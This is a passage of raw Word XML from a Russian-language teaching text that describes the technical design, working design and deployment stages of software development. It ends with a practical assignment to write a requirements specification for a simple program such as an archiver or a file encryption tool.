      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>окончательно определяется состав и структура информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>разрабатывается интерфейс во всех его компонентах;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>технология решения задачи доводится автоматизма;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>полностью определяется конфигурация тех средств, на которых ведется разработка ПС;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>определяется структура базы данных, где храниться информация о работе ПС;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>разрабатывается тестовый набор для проверки правильности программной реализации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>начинается разработка программной документации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>полностью определяется структура ПС (модули, компоненты).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Технический проект может рассматриваться как постановка задачи, передаваемой специалистом-постановщиком специалисту по программной реализации. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рабочее проектирование (рабочий проект)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Результат рабочего проектирования – получение ПС в состоянии операционной готовности, в котором устранены синтаксические и семантические ошибки, как в программном коде так и в программной документации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные работы этой стадии:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программная реализация (написание программного кода, привязка его к специфике конкретного объекта, адаптация и настройка программных модулей);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>отладка (автономная – в лабораторных условиях и комплексная – на объекте);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>разработка эксплуатационной документации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">организация внедрения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ПС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внедрение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На этапе внедрения осуществляют:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>подготовку персонала к эксплуатации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>подготовку базы данных;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>проверку работоспособности ПС на реальных данных (опытная эксплуатация);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>доводка – окончательное устранение всех ошибок в коде и документации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>По отдельным компонентам может быть откат на предыдущие стадии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="0009139F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Задания к практической части</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Выбрать ПО, на которое необходимо написать ТЗ из следующих:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>программный продукт, созданный студентом;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>архиватор;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>программа поиска файлов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>программа тестирования дисков;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>программа шифрования файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Сформировать следующие требования к проекту программного обеспечения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">к функциональным характеристикам, включающим перечень выполняемых функций, список входных и выходных данных, время для ввода параметров в программу; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>к надежности, содержащие требования к ОС, необходимой для обеспечения устойчивого функционирования, методы контроля входной и выходной информации и время восстановления после отказа;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>к условиям эксплуатации, описывающие требования к типам носителей, необходимую температуру окружающего воздуха, относительную влажность и т.п. для выбранных типов носителей данных;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>к составу и параметрам те</w:t>
      </w:r>
      <w:bookmarkStart w:id="191" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>хнических средств, содержащие перечень технических средств (компьютер, сеть, сетевое оборудование) с указанием их основных технических характеристик;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>к информационной и программной совместимости, включающие описание метода решения поставленных задач, языка программирования и программных средств, используемых программой;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">к технико-экономическим показателям, т.е. ориентировочная экономическая эффективность, предполагаемая годовая потребность, экономические преимущества разработки по сравнению с аналогами. </w:t>
      </w:r>
    </w:p>
